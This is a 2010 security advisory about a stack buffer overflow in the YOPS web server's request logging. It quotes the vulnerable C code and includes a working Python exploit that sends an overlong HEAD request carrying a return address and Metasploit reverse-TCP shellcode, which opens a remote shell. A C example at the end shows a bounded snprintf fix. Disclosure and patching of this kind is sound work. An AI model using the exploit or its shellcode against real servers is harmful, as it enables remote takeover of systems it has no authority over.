[DCA-00015]

[Software]
- YOPS (Your Open Personal [WEB] Server)

[Vendor Product Description]
- YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP server for Linux OS written in C. There are 7 stages (accept, parse, launch, fetch, error, send and log), and pipes are used as interstage channels.

[Bug Description]
- In the function http_parse_request_header, the application fails to perform a boundary check on a malformed buffer received as an HTTP command (HEAD/GET/POST) before using it as input for the logger variable in the swebs_record_log function.

--- http.c snippet ---
int http_parse_request_header(char *data, struct http_request_header *h)
{
    int r;
    int ver, rev;
    char *s, *tok, *l, *prm;
    [...]
    /* only the HTTP version is validated; the request line length is not */
    r = sscanf(h->http, " HTTP/%d.%d ", &ver, &rev);
    if (r != 2)
        return -400;
    [...]
}
--- END snippet ---

--- swebs.c snippet ---
int swebs_record_log(int log, JOB *job)
{
    int err;
    time_t now;
    char timestr[32];
    char logrec[MAX_REQUEST_LINE_LEN + 1];
    [...]
    /* unbounded sprintf: job->hdr.request_line is copied into the fixed-size logrec */
    sprintf ( logrec, "%s\t[%s]\t\"%s\"\t(%d+%d/%d)\t%d",
              job->client, timestr, job->hdr.request_line,
              job->response_hlen, job->response_blen_sent,
              job->response_blen, job->status );
    [...]
}
--- END snippet ---

[History]
- Advisory sent to vendor on 08/26/2010

[Impact]
- High (Remote Command Execution)

[Affected Version]
- YOPS 2009-11-30
- Prior versions may also be vulnerable

[Code]
#!/usr/bin/python
# Software:
# YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP server for Linux OS written in C.
# URL: http://sourceforge.net/projects/yops2009/
#
# Vulnerability: Rodrigo Escobar aka ipax @ DcLabs
# Exploit: Flavio do Carmo Junior aka waKKu @ DcLabs
# Contact: waKKu <AT> dclabs <DOT> com <DOT> br

HOST = "localhost"
PORT = 8888

import socket
import sys
import time

# request line padding length; overridable from the command line
try:
    BUFF_LEN = int(sys.argv[1])
except:
    BUFF_LEN = 802

FIXUP_ADDR = "\x47\xce\x04\x08"

shellcode = (
    # MetaSploit Reverse TCP Shell.
    # Host: 127.0.0.1 - Port: 4444
    "\x33\xc9\xb1\x13\xbe\xae\x88\x55\xcb\xda\xcd\xd9\x74\x24\xf4"
    "\x5f\x31\x77\x0e\x03\x77\x0e\x83\x69\x8c\xb7\x3e\x44\x56\xc0"
    "\x22\xf5\x2b\x7c\xcf\xfb\x22\x63\xbf\x9d\xf9\xe4\x9b\x3f\x6a"
    "\x9a\x1b\xbf\x6b\x02\x74\xae\x37\xac\xd7\xba\xd7\x61\x88\xb3"
    "\x39\xc2\x42\xa5\xe1\x08\x12\x70\x95\x4a\xa3\xbd\x54\xec\x8d"
    "\xb8\x9f\xbd\x65\x15\x4f\x4d\x1e\x01\xa0\xd3\xb7\xbf\x37\xf0"
    "\x18\x6c\xc1\x16\x28\x99\x1c\x58\x43"
)

buffer = "HEAD "
buffer += "A"*BUFF_LEN
buffer += FIXUP_ADDR*4
buffer += " HTTP/1.1"

stackadjust = (
    "\xcb"                  # instruction alignment
    "\xbc\x69\x69\x96\xb0"  # Stack Adjustment
)

payload = buffer + stackadjust + shellcode + "\r\n\r\n"

print """
######################################
### DcLabs Security Research Group ###
###           +Exploit+            ###
######################################

Software: YOPS 2009 - Web Server
---
Vulnerability by: ipax
Exploit by: waKKu
Greetings to: All DcLabs members
"""

print " [+] Using BUFF_LEN -> ", str(BUFF_LEN)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print " [+] Trying to establish connection..."
s.connect((HOST, PORT))
print " [+] Sending a dummy request to initialize data..."
s.send("HEAD DcLabs HTTP/1.1\r\n\r\n")
try:
    s.recv(1024)
except:
    pass
s.close()

time.sleep(3)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
print " [+] Sending our malicious payload..."
s.send(payload)
print " [+] Payload sent, good luck!"
s.close()

--
Rodrigo Escobar (ipax)
Pentester/Researcher
Security Team @ DcLabs
http://www.dclabs.com.br
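Bounded logging for the swebs_record_log() pattern quoted in the advisory, as an added example (not YOPS code): the unbounded sprintf() is replaced by snprintf() with truncation reported, and a parse-time length check is added in the style of the parser's "return -400". The MAX_REQUEST_LINE_LEN value, the reduced job struct, the -414 code, the timestamp and the demo helper are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Name from the swebs.c snippet; the value is an assumption. */
#define MAX_REQUEST_LINE_LEN 1024

/* Constructed stand-in for the YOPS JOB structure (field names follow the snippet). */
struct job {
    const char *client;
    const char *request_line;   /* attacker-controlled request line */
    int response_hlen, response_blen_sent, response_blen, status;
};

/* Parse-time check the original parser lacks (hypothetical; mirrors "return -400"). */
int check_request_line_len(const char *line)
{
    return strlen(line) > MAX_REQUEST_LINE_LEN ? -414 : 0;
}

/* Bounded replacement for the sprintf() in swebs_record_log(): truncates instead of
 * overrunning logrec. Returns 0 if the record fit, 1 if truncated, -1 on error. */
int format_log_record(char *logrec, size_t logrec_size, const struct job *job,
                      const char *timestr)
{
    int n = snprintf(logrec, logrec_size, "%s\t[%s]\t\"%s\"\t(%d+%d/%d)\t%d",
                     job->client, timestr, job->request_line,
                     job->response_hlen, job->response_blen_sent,
                     job->response_blen, job->status);
    if (n < 0)
        return -1;
    return (size_t)n >= logrec_size ? 1 : 0;
}

/* Logs a constructed request line of request_len 'A's into a buffer sized like
 * logrec[] in swebs_record_log() and returns format_log_record()'s result. */
int demo_log_request_of_len(size_t request_len)
{
    char logrec[MAX_REQUEST_LINE_LEN + 1];
    char *line = malloc(request_len + 1);
    struct job j = { "127.0.0.1", line, 0, 0, 0, 400 };
    int rc = -1;
    if (line != NULL) {
        memset(line, 'A', request_len);
        line[request_len] = '\0';
        rc = format_log_record(logrec, sizeof logrec, &j, "26/Aug/2010:00:00:00");
        free(line);
    }
    return rc;
}
```

A request line long enough to overflow logrec in the original now produces a truncated record and a return value of 1, which the caller can log as a malformed request instead of writing past the buffer.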